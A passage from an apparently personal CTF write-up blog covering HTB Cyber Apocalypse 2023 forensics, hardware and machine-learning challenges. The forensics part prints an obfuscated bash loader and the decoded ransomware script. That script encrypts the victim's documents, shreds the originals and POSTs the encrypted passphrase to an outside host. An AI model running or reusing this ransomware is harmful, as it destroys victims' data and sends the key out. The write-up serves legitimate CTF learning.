QURUBVWSNkTFBSRSFEITVETJZEISV1TZlQCK0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLJkgCG9URg0CP8ACdhNGIgACIKsHIpgCVt52Y3IjcENjUX5WaHFTYQ5GM2pgC9pAWjdVMNdWdVZjQyUTUoREI0V2cuVXCKkgCl52bklgCpZWCgASCKwGb152L2VGZv4jMgISakICI11CIkVmcoNXCJACIJoAbsVnbvYXZk9iPyAiIpRiIgYTNyMVRBBybnxWYtIXZoBXaj1SLgMWayRXZt1Wez1SLgADIkZWLlNXYyhGczNXYw1SLgAXY5UTYuISakICIv1CIzVWet0CIoNGdhJWLtAyZwdGI8BCWjdVMNdWdVZjQyUTUoREJg8GajVWCJACIJogblhGd70VXgoiIuoiIqASPhASfptHJgs1WgYWaJkgCvRWCKsjchJnLqAien5iKggnYktmLqAiZkBnLqACej9GZuoCIj9GZuoCI0hHduoCIulGIpBicvZWCKkAIgoAcoBnL2NWZy9ycldWYrNWYw9SbvNmLsxWY0Nnbp1SawlHcuMXZslmZv8iOzBHd0hGIiU0bkJHamx2RkFncmZ2ZxBkIgknch5Wai1SY0FGZt0CIUN1TQBCdzVWdxVmct0CIsJXdjlAIgoQYoFmYzgGMQFHRsh1Z4JFI11CIkVmcoNXCKASYoFmYzgGMQFHRsh1Z4JFIl1CIF9GZyhmZsdEZxJnZmdWcg8WLgISeltUbvNnbhJlIgIXLgMXZ51SLgg2Y0FmYt0CInB3ZJoQYoFmYzgGMQFHRsh1Z4JFI+ACWjdVMNdWdVZjQyUTUoREJg8GajVWCKA2Jux1JgQWLgIHdgwHI2EDIu1CIkFWZoBCfgcSXdpTb15GbhpzWbdCIv1CIwVmcnBCfg02bk5WYyV3L2VGZvAycn5WayR3cg1DWjdVMNdWdVZjQyUTUoRUCKsHIpgiNvV1Q51mQQdUdHlkTNFTRQlVTNpgC9pAdzVnc0BiI5V2St92cuFmUiASeltWL0lGZl1SLgADIkZWLk5WYt12bj1SLgcGcnBCfgIibclnbcVjIgUWLg8GajVWCKQncvBXbp1SLgcGcnBCfgUGZvNWZk1SLgQjNlNXYiBCfgoGZPl3MLdzb0UmV5pGb0RCIvh2YllgCi0TPRxEdwMFT0NHMRBFerF1ZrZlUMJUeRpEerFlVCZUSRRWRVdWUrRlRxMFT0BzUMt0Y6ZVcGhFULV1VZhFewkFWWNjWDRmMTNzb3NWNJZlVWJVVWZDaxsEcO1WZIJ1RXBlQUZldNpWU0YkblNjTIdVNJd1YRJlMT9kSy4kNWRlUysmeM9EZV9kcodlUIRmRWxkVXJ2SKNDZCR2aTFjWtN2SjR0VahmaiVzZxwUUoh0T3BnbaVTUxMFVoBDT2RTRi5EbzQmc4c0V0BHbkdFaYNleOhkUuxWRaVjUtZlUSZUZzJkVUZFZw0UNCp2Y4R2VhRnWXlVdS12QHh2VOFTRGZlS0VVTytWVaRHdyMFMKh1VMJFWU5EaE9EdaFTUhlTRUNnTF1Eao1WYws2MidFZHplc0VlTzc2Vhh3cTVWeR52VxYlRV9mS6Z1aGdkYMB3dLVFbwM2dNJjYDRGVjFXNws0VKBDTxIkVhhkRFNVNzNlTzxmajdlWqNla0NlW1c2RiBnWyEWS5MUVwQ2ahhFbXVVawhVZL5ESlNnWXpFb4BDTVRmeLt0Zwolaxc1URJkai9GZEJ2dFVVYzEERXRjTX50bCxWUyUFMkZEdpN1dv52V0p0RhtEZGJGMZ5mWopFST9UOtVFRSpXW2Q3RjxmU6VFc4tWW1UlaOBDZsNUY0NEZ1cmRTdHZqRlcJVVVZxWMUdnSzQ1d3JjYvhGMWZVOVNmWkNTYMhWVUxUMtVFcoREZF5kMLpFdHJVRKRkW2tWbOFlUUFlcFxmU2NWMiZnRz0UdwFlTLRmbU9WOTVVNSRUZzAnMTpkTVJmTONjYI5kbilnWwQldopGVxJleUhkQ6JFcoZFV1c3VN5mVFdld0AzYLBnVhl3aFFWNwc1UGR3RiNTRtJGUWZUVL1UVXBDbXVmVwZVWKZlekZkWrNGW1U0V4pEWOJTUVVGcSdUYLh2aahUO5R2VoV1UthWbadnUwIVcWd1YRVzaUlkVU9kTShVUzYUVPJEcGJmWWFzUxM2aD9kTH1kdFFTYu5UVRNDZzIFRONDT4V0RVRnRrJlW4d1VWRXVOhUNwk1d4M1UDZEMRVjTUNlVw12UPFzahxGZsJlRWVVYHR2VR5mTrFlbKtWU5NWVVBHcnFlQGZVUTZUVVVlVIF2MGpnU1oURShlQW9Ub0NUT4plaOVnTYVGeNpWYMRmMOVFcYJWMNZlWXBnba5mUINVNBpXW6pFWjpnTXpVTO5WZxZkbR1mRXl1SnNjWOBHSP1mUu1EeFRkY4plVhJzZVdlck5WTExGSTBFdtNVNKR0VDxWRjdEcFZFTk1WY5hGWl5mQ6JlWaFzY0oVbl1kQY5UNGRUTEVzVPhGcwImexs2Q1cmMMNlTrN2MGVlYxMmaS9mV6JWWxcUYwpkRlRDdFFGVwtWYChGMkRnUXNGSshlUzY0RjBHewkFMoVUVFhHMZREZyskdRJjYohnMVpHMFVlN1s2Y29WUR5kWxUFVkhEZ6NGSTpnWtJ2T0dVUHhXRhREcsRlNKpnYJp1MLpnWrNVNwdlYLZUbZBHayY1TOBTWMRXaNBnQuFWYoxWTQ5URShGaqR1cWZVZo5ERltEMHVFdkhVTWVDMVBzZYJlejpHTCJFbXdXWzM2RsNzYqRmRkZ3axIlQONjWzoUVVBlVWJWeztmVE5ERlJUOH1kbsR0T2RDMW9GbUF2T1AzSNxmekNkQqNEbad1UoRmVOZkUuJmcvxmYulTVU1mWIJlSaZ0UuZURadnRXR2TatWTCxWViFHZwEFMFxWYXp0aSRkSVFmMsVFZ6lDMTRDZWlVerZ1VshWMiVnRtR2dwFkTSZlaaVDarZVNJt2YwsmbOpGbVpVUsJTVOZFbV9mQIV1QaZVThplbjZlSEJldZh1VIBnbTpGZF9Uas5WVYRWVlNnRqNFewNjTVlzaXBDcGJFdSVkTLFkRkVUNtZVaodUVzgGVWJjWVJ1cwhVUGBXbjxkSwMmW0tmURlzaahHNXJleOVkYEhWblVzZwQGSapWZxh3VVNjSGVVMORlTwRWMWpnRYNGMwNjYUpUbDRVMtRmdwclTMZUVUZEZzsUWKh1TaZVRNplRV5kcwAjUxQXVkVHZxQWTopXV1kkaaRjUIJ2QkRlWIJFSV5kUx4kcn1mV6JleNpmT6VFSaJTU5pESkJ3bBJGeOZkYV5ERkVjStFmSxATWqJ1MVlFaId1SC5mT6hzURhkTsVGdKpWVyUVMUFDMXNVdCxWVxolVNNUMrRmW4VkWs50ROFlWIVWeZhlYzMmVlFFZ610SZ5mTEhHMWFGbX5UV5c0TxgHMaFTSWpVerdkTsB3ajdEbI1kMOp2U3RGMNFzbYpFdSVFZEhGbZ1kUFRFWWBjUuhHMW5kUrFWesZlWLh3aNZUOH1ERS52QJhWVahlUWlVMadUZ0RWRX9kUwU1V1U1TXpVRhtEcupFdCFjUVVzVTtkRUVWekZUZDRWMZBHZxQFUCNTUGpkRiJHZFFGM0NVZtplRkNVODdlbWdVUVB3dTFzdHJWWsdVT0oURiNlVGZlNatGVrpUVUBzYsFmMjhkTTxGMhZjQE1UY0dlYzh3RhRTWUZlM4V0UYVzaZVFcrlFWkpnUIhnMiJHbtlVNjZUZoZUbUt0aGJ1MOhkV5dWMSBnRUdlcVh0VZlzUkNHctRWN4IDVvp0VTllWupVNnpHTXJlbTlkTrVFbGJjYZp0aURTTsNFN0JzSOxmRNlXVsJGeOZlUyUkbjBDasNUMsdkWyFkaTdnVtp1dB5WTYp1RahnUtlFbOVkU1xWbTdVOVZlSORlYrJVRlpkU65EWOhlTzIEWaZXMHJmcnd0TCh2aWpXQuFVVxs2YRZVRNRkVVJlRwdGVwQmRUVnWEFGeVRlWrZEVlhmVyklRkNDZ1kkbTNjVyoldoREZRxGMhRTVwolSopXU2hGWidlRzEWMOVkV0okMhplWVVlRk5WWoZEMWlkUysESstWYLNGRlVEasRmWCNDZhRmaOFTS6pld0IzY2YlRlhXU6xERCpWWxolVhNlQzEWaCpHZTlzQSNlTwMlQGBjWZxWVVJkVXNlUGVkUKRWbSZEbwQGRsBTYu50aDdFbxolQoBjWS5URUZFZYFVasBDZydGbjVzaxElVk1mVwpkRjJnSH10MKFDTxZVVRpEbrpVcGxGV0Jkek5kWqd1VGZVVKRWMaVkRwMlRkhlUGJleZJEcnNlMRtWWvVzaNlmTY5UNG1WYHRWVZJkRq1UawhlTYxmVlRjUVNVMZxWTUJFWPlXTXR2RxclVrZEbZJkRVJlUWVVU0AzVOFHZU5ESOdlYzU1aZJFbYV1SzVUTYlzahdnSVNmasxWV2RXbRhHOTNmQ1cVW6t2MMVlV6tUYkh0Vrp1VXFFdHRmevZVV4N3VNJTWHVmR5U1YyRmaUJEZERFeNFDVDpkaWBDaqN2Qat2Q4tmVkZXNrFlRoNDVMpkMUtmTuNlQKVVT0MmeTtmRsJlWS1mYNpEWXhXRsFmVxU1VaxWVT5WOD5ESCpnYGpVVSBVNF5ETsV0TUJFVTRzZE9ENVd0Tx82dNBzYU5kcJ5GZ5d3VihXVz0EdCRFZvJFSjZEaXRGcahkV2gmRi1mRwE2dZ1WUwJEWOpmSrNmM4UkT2p1VZ9EZIdVWONDZzIEWS9mRWNGMnRlVth3aNt0bI1EW0l3UrhWRkZXSuRWU41mVHljMMhmWGR1b01WU6h2ROVFZHNVbwJTVL5UbOZVODNmeWVUVHpFWZVjTVFlUsNjWPxGVjBDazYVMNVVZUx2MVlGbsNEeS1WVWhHMWlFeVJmQOhVYtx2VNdXUwQmd0ADTTZ0MjNHZV1EaGJjWzYFRONTT6RmWSh1VUZURa9kSqVlcFhVUpJEWaREbIVmesBTTuZkeZdFbFJGawFlTJh3aXVDbXNlVOxGVwUVVjpXSW10cONDZSx2aUVkT6ZldBRUYyg2VTJTREJFNvZ0YHZlVPtGdH1Uc1IDTVp1aSRDbYdVY0tmWZRGWZVkRw4EMjR1YLl1MOllTFNWNwdkWNlTeNlnTU50VwVUT0kjMLhkTWd1MnpWT6RWMWBlWrZVMFNTU2lEbiJDdH9Uc0lWYEhWRhRTRG5EdGVkTuxmVlBDa6tkMOR1UpZ1aDNDcyE1RkBjY5NHMN1EetJVWaBTVsZURPdXV6p1MsNjUIZEbR5kWwMWRshVY1JkbW5kRuFWYOpmV2YVVSpEbEJFWSVVUFpEMjZXRUlVUktWUPRWVVRHcnNEdwMFT0BTeTRUOFR1QCN1VGRXRJREbFR1QWZUVnFUMSFlQpRlSkVlUDFzUMRHMTxkI9oGZPl3MLdzb0UmV5pGb0lgC7BSKo0UW6RnYzR1Q2YkTYF0M3gHSNZUdKg2chJ2LulmYvEyI
' | r";HxJ="s";Hc2="";f="as";kcE="pas";cEf="ae";d="o";V9z="6";P8c="if";U=" -d";Jc="ef";N0q="";v="b";w="e";b="v |";Tx="Eds";xZp=""
x=$(eval "$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp")
eval "$N0q$x$Hc2$rQW"

After using python to concat these strings, I got a base64 string, decoded it and I got a bash script:

#!/bin/bash
uFMHx73AXNF6CTsbtzYM() {
 tljyVe4o7K3yOdj="LS0tLS1CRUdJTiBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tCgptUUdOQkdQYTEvc0JEQURXRDlJRUV6VjNaanFNVnBuaXlEc0ZNQlFHR3l3ZzUwOEFlU0ZYRmxMM0syb0dGQ2p3CkViSTN2Kzh0eVlnNEFtNFE4aEhDaitqOGt2blIvQ3E1VkZPV1dzMjg3WVNHK294MEpWNTNyMy9MZGp5cENYN3YKcTc0N0FEYXdYZktaWXl4RkZUL25qMGtkOVVGcFo4RDE2SWh2aDAvVzNETklRd3NsMVIzcUU0TlNVSWl5WkxINQphbElWYzFnM0lzeHlDZXBiQXErUjJOZEFTWXRZdzM3NDV3Z2FhMUdsc3FSL04vd0QwMWlmaXNBbUxYV0xVUmRxClliU3lTeUM1V3h0cTlOZ3lRQUN5YXZGUEVzcC9VNmNKU2pmSGdUNGhzQmtoTFZhL29GVmxQdnIvdEhkSytXMHoKMkxmVTg0cVFoRXB3d3NYWHdOYWZvNE82ckJjNXBpQmYwa0FmbFh6VHZpdWhFcHRodTBtM3UxbWwydnIrNTc0Mwo1OGU4ODg4STRTOElLNE5PRUZFbzBHNC9nSUlZWU1ValExWXJMbmRZRlFkSzc4MUJBSnNkT2JLT3hFQk5vdVkxCkZCcjh0VjJCT1MxTDdBTjdrcU9FeGY2MWsxUVozdGtQWWZkWHdaKzVUL3kzYW5BcS8xQmtvUlljcUJwak9XMEsKUXlRYkU3bWNHNTdqNW04QUVRRUFBYlFkVW1GdWMyOXRTMlY1SUR4eVlXNXpiMjFBYUdGamF5NXNiMk5oYkQ2SgpBYzRFRXdFS0FEZ1dJUVFWWjZNdzBtTlFqZklJQUVqL1J3MGJrcFJpVmdVQ1k5clgrd0liQXdVTENRZ0hBZ1lWCkNna0lDd0lFRmdJREFRSWVBUUlYZ0FBS0NSRC9SdzBia3BSaVZ1YjBDLzQxeFV6c24vZzI1Njdad3BZdlhEeDcKaklHK2RIV0FhYndFUUZZa2J4VEN1a3FWbXhvQzhJZ0U4a0lQdDhvZ2V3SnI5d3dFY2VheTFkZTUxaDZuTFd0TgpFRUVDMEVQck1UQnAzVkhBOGgrbG1vZXB3NXNXNzRJeERkbTNJVU9WSmluRENlYmRxZGZXMnAwZmVwSjArZGl1Clh0cnE2RVNxblUyMFlNK2t4SlM4TkJYb2FlUkNISnRWLzg5ZnZYSWJoT285dmpsdS9YWHUrWTFpR1gyVHN3RFkKTmFheFc5Ymlrb2xHRzdXYkpUYk5XSEx2VTY4aGxsbWtaMDB6a0lSNHc2alc0TUJkTkZ6VFVSbEJ4MWlYbGw1SwpUQWVnWC9SdFZmeSt0aEdrbFJFQ3BPT1dpY1dCeFdyeTFKSW5UR1BtZnpKaEZWOU5WU0ROWEdteGZ1YVRXZUhICnRDMG9FMkxKZVlyakRNV0xnR0VXTERMYlhDdURtZXo1M0dwSjN2MHlGckplNGkyZVI1Z0x1OG9UNWlaV0xDNnYKMzdQeVc3bXYyeHZQNGNlZExZdk1CMVZ1UlBuSW01T1U2UjJtelNHQS8zNnBKWHhYU3RjY01JamJ5dDNUbFNxbAordHJyQ2ZHUzNjMzRzVmgrN1RNUHRHZTdCbHR4ZjI5UzhMd1dudUt1R00rNUFZMEVZOXJYK3dFTUFLNW0vdm1TCmJTb3p0cXFzV1dpNTN1UFJ3UWxqejZHd0g5emhDbENzRW4xZk9QRktZc0JLcmpFQXpsRUZ2VTh3UGhiVm5EdFAKNERtRFp0Wk9UN3pxSjFseUdXUnliOEdjSnpHWXYvRDJVcnZaMVZCUHBoUlVNU2lQZUljNnk0ckI5Vkh5ZjVRNApwdmFub1hlWVkyYVd4S09zdUl2aUJDRkJWalE0Q0dqbUlBMkZOdWFwZEFnSFZJRHZmTU9nblorbnRFNVdhSWZlCjBCdzlMK05OaTloV04vODlnMG9BeDNDVksybVVPUUJ3Z3NBR1kvdFdjc3lGc3YwWlRBLzczRXg0U05VMXdtUG0KeDNheVVsTjhhRENPMlhaanBpMitLY0NOV2hpYmFKbWp5SkZzK3ZIbzJ6TlpDaExGQWtObmZzSHczdHdTU1ZNQQovck56UE0zU2xhb2QvK2dDY0xEUEh0Y0xpcGF3RXlHcWRtd0hBakpTaEt4eFJpaG1YbzVoRjc1bUF3ckNSL2g5Ck1zb0phOW5DMDF5NXBMemZ4c1ZZRzBneXhyamdLVEpGcElCWDJ5SmtPSHlDMndrWUg2aVZxbDExMnRmOHpNZ3gKYWFmQnFqenNMZWNzcXZzYzA5SHRnZnpWZVM1bXpUN2dLajMxeXNuNjZxMCtmOVBXREJ5RzF3aHVUUUFSQVFBQgppUUcyQkJnQkNnQWdGaUVFRldlak1OSmpVSTN5Q0FCSS8wY05HNUtVWWxZRkFtUGExL3NDR3d3QUNna1EvMGNOCkc1S1VZbFpBOUF3QXRNOTVITk5QcWVqR0RwZmhmSUhWdy9HZkhKaGRpeUQ2NXJxWE5XckZFdzVJYVpVeWl0WUMKUFVPbmE3bGtFSW05aEkyaVpKc04vWEVnMWw5TVhpRzBHTzRqTjhvT0ZybnNHb3NNbUNJS2p3eDR5US9oTndKNQpuM3Fvb1cvRlErQTRQNmkvZDJERGtZK2NEdDhpUm1LTUhLa3dZcU9VV0hob2wwT3JwT1lYUUIrTjdwSFg5dCtaCld0NjU5YkxpUzRlcGt6YzRDUm9OSHZhZnY0bFdKaGJtWnowSitFd0U2QlBoNWN4WDA3aUEwbDdobjBQSW1jZ0gKKzdUL0xlZWZseHNKeXpiUWlXakd0UC9Ia2ZpbGg5ZStjSjZWcjlsNSs5SEFHaVB1L0JWK05qcTdCb2Mwc0lUKwpLbGFkVzJoUFV1WnQyeSsxaWg3NUtrZGdWb3k0amhhMENsTE9aQ1ZtODhNTXRLWXJ0S2ttZUkrMUtJVFE1NWhGCmRuYWZtaWdxcjB5M0dVTVBseFRRVmR5ZElnRHNzSXhWdlptWG8rd3lNbE4vL0hTS1Q5ZnpwOHhQL1g5bjhZWDcKcmZ1SkdBd3JKbWVLVFdHRWhrOUdOLzk2RTV6N2JOS2RQcWI5WHN3enF4QjMvVTBPWGRHemNpK1h6VURVVVI5cwo3S2dCZ3VXY0xXYWUKPXFqVzcKLS0tLS1FTkQgUEdQIFBVQkxJQyBLRVkgQkxPQ0stLS0tLQ=="
 echo $tljyVe4o7K3yOdj | base64 --decode | gpg --import
 echo -e "5\ny\n" | gpg --command-fd 0 --edit-key "RansomKey" trust
}
MMYPE1MNIGuGPBmyCUo6() {
 DhQ52B6UugM1WcX=`strings /dev/urandom | grep -o '[[:alnum:]]' | head -n 16 | tr -d '\n'`
 echo $DhQ52B6UugM1WcX > RxgXlDqP0h3baha
 gpg --batch --yes -r "RansomKey" -o qgffrqdGlfhrdoE -e RxgXlDqP0h3baha
 shred -u RxgXlDqP0h3baha
 curl --request POST --data-binary "@qgffrqdGlfhrdoE" https://files.pypi-install.com/packages/recv.php

 for i in *.txt *.doc *.docx *.pdf *.kdbx *.gz *.rar;
 do
 if [[ ${i} != *"*."* ]];then
 echo $DhQ52B6UugM1WcX | gpg --batch --yes -o "$i".a59ap --passphrase-fd 0 --symmetric --cipher-algo AES256 "$i" 2>/dev/null
 shred -u "$i" 2>/dev/null
 fi
 done
 unset DhQ52B6UugM1WcX
}
v0nPa1GinWR3Dr27cnmT() {
 # Just a function to print strings
}
ExoPFDWb3uT189e() {
 uFMHx73AXNF6CTsbtzYM
 MMYPE1MNIGuGPBmyCUo6
 v0nPa1GinWR3Dr27cnmT
}
if [[ "$(whoami)" == "developer7669633432" ]]; then
 if [ -x "$(command -v gpg)" ]; then
 ExoPFDWb3uT189e
 exit 1
 fi
fi

2. Bash script analyze

I used ChatGPT to analyze the script, it was much faster than if I analyzed it by myself. There are two functions that we need to notice, uFMHx73AXNF6CTsbtzYM and MMYPE1MNIGuGPBmyCUo6.

The uFMHx73AXNF6CTsbtzYM function decodes a base64 string and imports as a key using GPG.

The MMYPE1MNIGuGPBmyCUo6 function will generate a random string of 16 bytes consists of only alphabet and numbers. Then, it encrypts all files with GPG using the random string as the private key.

Now to find private key, we will immediately think of using volatility3 to find the key in the mem file, as they are the only file that hasn’t been used. However, in this writeup I will present to you an unintended solution as I didn’t figure out to solve it using vol3 in contest’s time.

My unintended solution was a famous trick in forensics, grep. I used GPT to generate a grep command to find a string of 16 bytes consists of only alphabet and numbers.

I try some sussy strings and found that the private key is wJ5kENwyu8amx2RM. Now we just need to decrypt the flag file and get the flag.

Flag is HTB{n0_n33d_t0_r3turn_th3_r3l1c_1_gu3ss}

Original Posts

Cyber Apocalypse 2023: The Cursed Mission - Hardware

Mon, 27 Mar 2023 00:00:00 +0000

Table of Contents

Timed transmission

Given file: Get it here!
Description: As part of your initialization sequence, your team loaded various tools into your system, but you still need to learn how to use them effectively. They have tasked you with the challenge of finding the appropriate tool to open a file containing strange serial signals. Can you rise to the challenge and find the right tool?
Category: Hardware
Difficulty: Very Easy

Problem Statement and Results

What we have is a really strange file with .sal extension. I think the hardest part in this challenge is finding the app can open this file. After searching on Google (and Chatgpt), I found a suitable app called Logic 2. Open the file and enjoy it :D

Flag is: HTB{b391N_tH3_HArdWAr3_QU3St}

Critical Flight

Given file: Get it here!
Description: Your team has assigned you to a mission to investigate the production files of Printed Circuit Boards for irregularities. This is in response to the deployment of nonfunctional DIY drones that keep falling out of the sky. The team had used a slightly modified version of an open-source flight controller in order to save time, but it appears that someone had sabotaged the design before production. Can you help identify any suspicious alterations made to the boards?
Category: Hardware
Difficulty: Very Easy

Problem Statement

Given a lot of GBR file. Our mission is to somehow find the flag :D.

Results

These files are called Gerber files - a standard file format used in the manufacturing of printed circuit boards (PCBs) to describe the PCB’s copper layers, solder mask, legend, and other features. To open this, reader can access this website: https://www.pcbway.com/project/OnlineGerberViewer.html. We can easily find all parts of the flag in this board:

Flag is: HTB{533_7h3_1nn32_w02k1n95_0f_313c720n1c5#$@}

Debug

Given file: Get it here!
Description: Your team has recovered a satellite dish that was used for transmitting the location of the relic, but it seems to be malfunctioning. There seems to be some interference affecting its connection to the satellite system, but there are no indications of what it could be. Perhaps the debugging interface could provide some insight, but they are unable to decode the serial signal captured during the device’s booting sequence. Can you help to decode the signal and find the source of the interference?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Hardware
Difficulty: Easy

Problem Statement

We received file with .sal extension - which contains a signal capture of a device. Our mission is identify which device is captured and how to decode the signal to decrypt the communication.

Solution Method

We use Logic 2 to open this file, then receive this:

There is only one channel with signals so probably we are talking about UART protocol. For doing that, first we have to calculate the baud rate (bit/s).

To calculate the baud rate in this signal we zoom into the very first signal and see the minimun period of the signal. We can see that the smallest period between two high values is 8.68us. So, 1 bit needs at least 8.68us to be transfered. The baud rate therefore must be around 115200 (bit/s). Let’s configure the analyzer with this value:

Results

The flag is showed at the terminal, after correctly analyze the signal:

Flag is: HTB{547311173_n37w02k_c0mp20m153d}

Secret Code

Given zip: Get it here!
Description: To gain access to the tomb containing the relic, you must find a way to open the door. While scanning the surrounding area for any unusual signals, you come across a device that appears to be a fusion of various alien technologies. However, the device is broken into two pieces and you are unable to see the secret code displayed on it. The device is transmitting a new character every second and you must decipher the transmitted signals in order to retrieve the code and gain entry to the tomb.
Category: Hardware
Difficulty: Easy

The challenge gave us a .sal file and a folder of .gbr files.

You can use any Gerber file viewer software to open the .gbrjob file but in my case I used KiCad and got the following circuit board.

We could clearly see that this was a typical 7-segment LED display. Tracing each channel connection to the LED itself, we got the channels corresponding to the segments on the display as follow, with channel 1 being the dot.

Next on line is the .sal file. For this I used Logic 2.

I extracted the bits from every channels one by one using channel 1 as the clock signal. I noticed that the machine was sending a hex string so I wrote a script to decode all of it.

c = [
 [0,1,1,0,0,1,0,1,0,1,1,1,0,0,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,1,1,0,1,1,0,1,1,0,1],
 [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
 [0,1,1,0,0,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1,0,1,1,0,1,1,0,1,1,1,0],
 [1,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,0,0,1,0,1,0,1,1,1,0,1,1,1,0,1,0,1,1,0,1],
 [1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,1,0,1,1,1],
 [1,1,0,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,0,1,1,1,1,0,0,0,0,0,1,1,1,1,0,1,0,0,1,1,1,1,1,1,0,1,1,1,0,0,1,1,1,1,1,1,1,1],
 [0,1,0,0,0,1,0,1,0,1,0,1,0,0,0,0,0,1,0,1,1,0,0,1,1,1,0,0,0,0,0,1,1,1,0,1,0,1,1,1,0,1,0,0,0,0,0,0,1,1,0,0,1,1,0,1,1,0,1,0,0,1],
 [1,1,1,1,1,0,0,1,0,1,0,1,0,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,0,1,1,1,1,1,0,0,0,1,1,0,1,1,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,0,0]
]

flag = ""
for i in range(len(c[0])):
 if c[0][i] == 0 and c[2][i] == 0 and c[3][i] == 0 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 0 and c[7][i] == 0:
 flag += '1'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 0 and c[5][i] == 1 and c[6][i] == 1 and c[7][i] == 0:
 flag += '2'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 0 and c[7][i] == 0:
 flag += '3'
 elif c[0][i] == 0 and c[2][i] == 0 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 0 and c[7][i] == 1:
 flag += '4'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 0 and c[6][i] == 0 and c[7][i] == 1:
 flag += '5'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 0 and c[6][i] == 1 and c[7][i] == 1:
 flag += '6'
 elif c[0][i] == 0 and c[2][i] == 1 and c[3][i] == 0 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 0 and c[7][i] == 0:
 flag += '7'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 1 and c[7][i] == 1:
 flag += '8'
 elif c[0][i] == 0 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 0 and c[7][i] == 1:
 flag += '9'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 0 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 1 and c[7][i] == 1:
 flag += '0'
 elif c[0][i] == 1 and c[2][i] == 0 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 0 and c[6][i] == 1 and c[7][i] == 1:
 flag += 'b'
 elif c[0][i] == 1 and c[2][i] == 0 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 1 and c[7][i] == 0:
 flag += 'd'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 0 and c[5][i] == 0 and c[6][i] == 1 and c[7][i] == 1:
 flag += 'e'
 elif c[0][i] == 0 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 0 and c[5][i] == 0 and c[6][i] == 1 and c[7][i] == 1:
 flag += 'f'
 else:
 print(c[0][i], c[2][i], c[3][i], c[4][i], c[5][i], c[6][i], c[7][i])

#print(flag)
print(bytes.fromhex(flag))

Flag is: HTB{p0w32_c0m35_f20m_w17h1n@!#}

Cyber Apocalypse 2023: The Cursed Mission - Machine Learning

Mon, 27 Mar 2023 00:00:00 +0000

ctf

writeup

htb-2023

Table of Contents

Reconfiguration

Given zip: Get it here!
Description: As Pandora set out on her quest to find the ancient alien relic, she knew that the journey would be treacherous. The desert was vast and unforgiving, and the harsh conditions would put her cyborg body to the test. Pandora started by collecting data about the temperature and humidity levels in the desert. She used a scatter plot in an Orange Workspace file to visualize this data and identified the areas where the temperature was highest and the humidity was lowest. Using this information, she reconfigured her sensors to better withstand the extreme heat and conserve water. But, a second look at the data revealed something otherwordly, it seems that the relic’s presence beneath the surface has scarred the land in a very peculiar way, can you see it?
Category: Machine Learning

In this challenge, we embarked on a quest to find an ancient alien relic hidden beneath the desert, following the footsteps of the cyborg Pandora. The task involved analyzing temperature and humidity data and uncovering peculiar patterns that hinted at the relic’s presence.

To begin the analysis, we downloaded and installed the Orange data mining tool, which is an open-source data visualization and analysis tool for data scientists. You can download it here: https://orange.biolab.si/download/

After installing Orange, we opened the tool and loaded the analysis.ows file. We then imported the point.csv file into the Orange workspace by adding the “File” widget and selecting the point.csv file from our computer. Next, we created a scatter plot to visualize the data. We added the “Scatter Plot” widget from “Visualize” panel to the workspace and connected it to the “File” widget.

By viewing the “Scatter Plot”, we got the flag:

Flag is: HTB{sc4tter_pl0ts_4_th3_w1n}

Mysterious Learnings

Given zip: Get it here!
Description: One day the archeologist came across a strange metal plate covered in uncommon hieroglyphics. It looked like blueprints for some kind of alien technology. “What kind of magic is this?” He studied the plate more closely and was amazed by the advanced technology and incredible engineering they were using at a time like this. This could only lead him in him wanting to learn more…
Category: Machine Learning

In this challenge, we were given an H5 file containing a pre-trained machine learning model. Our task was to analyze the model and extract a hidden flag.

H5 file format, also known as Hierarchical Data Format (HDF5), is a versatile data model that can store large amounts of data efficiently. It is widely used in scientific research and engineering for storing and managing data. The format organizes data hierarchically and enables fast I/O operations.

To solve this challenge, we first needed to load the model from the H5 file and display its summary. We used TensorFlow and Keras libraries to achieve this. Here is the Python script:

